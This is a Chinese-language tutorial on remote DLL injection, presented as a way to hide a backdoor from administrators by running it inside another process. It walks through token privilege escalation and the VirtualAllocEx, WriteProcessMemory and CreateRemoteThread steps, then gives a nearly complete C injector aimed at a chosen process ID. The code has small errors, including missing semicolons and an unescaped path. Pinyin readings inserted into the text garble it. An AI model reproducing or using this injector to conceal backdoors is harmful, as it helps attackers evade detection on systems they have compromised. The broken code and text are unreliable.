遠(yuǎn)程注入DLL
沒錯(cuò),現(xiàn)在討論的就是傳說中的遠(yuǎn)程注入技術(shù),目前一種非常流行的隱藏技術(shù),因?yàn)樗鼪]有進(jìn)程,而前面討論的兩種方法都會(huì)有進(jìn)程出現(xiàn),因此,有經(jīng)驗(yàn)的管理員很容易發(fā)現(xiàn),然后先殺進(jìn)程,在找出后門文件刪除。要實(shí)現(xiàn)遠(yuǎn)程注入,我們要編寫兩個(gè)程序,一個(gè)是后門文件,這里不是把它寫成.exe文件,而是寫成.dll文件,在這里先說一下.dll文件,.dll文件,其實(shí)就是動(dòng)態(tài)連接庫,它里面裝封了提供.exe文件調(diào)用的函數(shù),一般情況下,雙擊它,是不能運(yùn)行它的,它只能由.exe來調(diào)用,于是就有了遠(yuǎn)程注入了,原理很簡單:我們把后門的主要功能寫成一個(gè)函數(shù),然后裝封到.dl文件中,然后再另外寫一個(gè)執(zhí)行文件來啟動(dòng)它,這樣就不會(huì)有后門的進(jìn)程了。那遠(yuǎn)程注入又指什么呢?這個(gè)問題問得好,一般情況下,每個(gè)進(jìn)程都有自己的私有空間,理論上,別的進(jìn)程是不允許對(duì)這個(gè)私人空間進(jìn)行操作的,但是,我們可以利用一些方法進(jìn)入這個(gè)空間并進(jìn)行操作,將自己的代碼寫入正在運(yùn)行的進(jìn)程中,于是就有了遠(yuǎn)程注入了。
對(duì)dll后門的編寫就不作過多的討論了,現(xiàn)在來看實(shí)現(xiàn)注入功能的可執(zhí)行文件的編寫:
用到的函數(shù)有:
OpenProcessToken();
LookupPrivilegeValue();
AdjustTokenPrivileges();
OpenProcess();
VirtualAllocEx();
WriteProcessMemory();
GetProcAddress();
CreateRemoteThread();
先簡單的介紹以下這些函數(shù)的作用,因?yàn)槲覀円僮鞯氖窍到y(tǒng)中的其他進(jìn)程,如果沒有足夠的系統(tǒng)權(quán)限,我們是無法寫入甚至連讀取其它進(jìn)程的內(nèi)存地址的,所以我們就需要提升自己的權(quán)限,用到以下3個(gè)函數(shù)
OpenProcessToken(); //打開進(jìn)程令牌
LookupPrivilegeValue();//返回一個(gè)本地系統(tǒng)獨(dú)一無二的ID,用于系統(tǒng)權(quán)限更改
AdjustTokenPrivileges();//從英文意思也能看出它是更改進(jìn)程權(quán)限用的吧?
進(jìn)入宿主進(jìn)程的內(nèi)存空間
在擁有了進(jìn)入宿主進(jìn)程空間的權(quán)限之后,我們就需要在其內(nèi)存加入讓它加載我們后門的代碼了,用LoadLibraryA()函數(shù)就可以加載我們的DLL了,它只需要DLL文件的路徑就可以了,在這里我們要把DLL文件的路徑寫入到宿主的內(nèi)存空間里,因?yàn)镈LL的文件路徑并不存在于宿主進(jìn)程內(nèi)存空間了,用到的函數(shù)有:
OpenProcess();//用于修改宿主進(jìn)程的一些屬性,詳細(xì)參看MSDN
VirtualAllocEx();//用于在宿主內(nèi)存空間中申請(qǐng)內(nèi)存空間以寫入DLL的文件名
WriteProcessMemory();//往申請(qǐng)到的空間中寫入DLL的文件名
在宿主中啟動(dòng)新的線程
用的是LoadLibraryA()函數(shù)來加載,但在使用LoadLibraryA()之前必須知道它的入口地址,所以用GetProcAdress來獲得它的入口地址,有了它的地址以后,就可以用CreateRemoteThread()函數(shù)來啟動(dòng)新的線程了,到次,整個(gè)注入過程完成,不過還不非常完善,這就留給聰明的你來完成了;)。
簡單的例子:
#include "stdafx.h"
int EnableDebugPriv(const char * name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
//打開進(jìn)程令牌環(huán)
OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken);
//獲得進(jìn)程本地唯一ID
LookupPrivilegeValue(NULL,name,&luid)
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = luid;
//調(diào)整權(quán)限
AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
return 0;
}
BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId)
{
HANDLE hRemoteProcess;
EnableDebugPriv(SE_DEBUG_NAME)
//打開遠(yuǎn)程線程
hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | //允許遠(yuǎn)程創(chuàng)建線程PROCESS_VM_OPERATION | //允許遠(yuǎn)程VM操作
PROCESS_VM_WRITE,//允許遠(yuǎn)程VM寫
FALSE, dwRemoteProcessId );
char *pszLibFileRemote;
//使用VirtualAllocEx函數(shù)在遠(yuǎn)程進(jìn)程的內(nèi)存地址空間分配DLL文件名空間
pszLibFileRemote = (char *) VirtualAllocEx( hRemoteProcess, NULL, lstrlen(DllFullPath)+1,
MEM_COMMIT, PAGE_READWRITE);
//使用WriteProcessMemory函數(shù)將DLL的路徑名寫入到遠(yuǎn)程進(jìn)程的內(nèi)存空間
WriteProcessMemory(hRemoteProcess,
pszLibFileRemote, (void *) DllFullPath, lstrlen(DllFullPath)+1, NULL);
//計(jì)算LoadLibraryA的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
//啟動(dòng)遠(yuǎn)程線程LoadLibraryA,通過遠(yuǎn)程線程調(diào)用創(chuàng)建新的線程
HANDLE hRemoteThread;
if( (hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL) ) == NULL)
{
printf("CreateRemoteThread error!\n");
return FALSE;
}
return TRUE;
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
InjectDll("c:\zrqfzr.dll",3060) //這個(gè)數(shù)字是你想注入的進(jìn)程的ID號(hào)
return 0;
}